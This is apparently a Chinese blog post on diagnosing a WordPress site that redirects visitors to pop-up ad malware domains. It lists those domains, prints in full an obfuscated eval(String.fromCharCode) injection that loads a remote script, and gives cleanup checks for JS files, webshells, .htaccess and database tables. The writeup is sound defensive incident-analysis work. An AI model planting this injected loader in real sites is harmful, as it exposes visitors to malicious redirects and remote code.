背景

一個wordpress站點 訪問主站後跳轉至其他惡意域名 抓包看了一下 利用的是302跳轉 而不是直接轉向其他站
請求域名如下

bestprize-places-here1.life
bestanimegame.com
auteartumn10.live
location.lowerbeforwarden.ml
adaranth.com
deloton.com

屬於pop-up AD malware，國內搜尋引擎沒搜到什麼東西

排錯

一開始上來一臉矇蔽 看了一些資料後總結如下：

檢視js檔案 是否有異常

異常js:

<script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,52,54,44,49,49,54,44,49,49,52,44,57,55,44,57,57,44,49,48,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,49,48,53,44,49,49,53,44,49,49,54,44,49,48,53,44,57,57,44,49,49,53,44,49,49,53,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,54,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>
 

搜尋惡意域名 或String.fromCharCode，不過還是要以實際js檔案出現異常為主，畢竟只是一種編碼方式

檢查php檔案

會不會被植入了webshell
.htacess檔案有沒有被修改
這裡因為沒有拿到原始碼沒法進行排查

檢查資料庫

資料庫是因為wp_options和wp_post兩張表裡有涉及主站url地址，這個被修改可能會導致問題發生

被感染的原因

這個查了很多都沒找到結果 郵件諮詢了一位老外 他認為是外掛plugins or themes引起的問題，比如最近的FileMangager漏洞，但是這個wordpress站點沒有使用

查了js和資料庫備份 都沒找到
參考連結：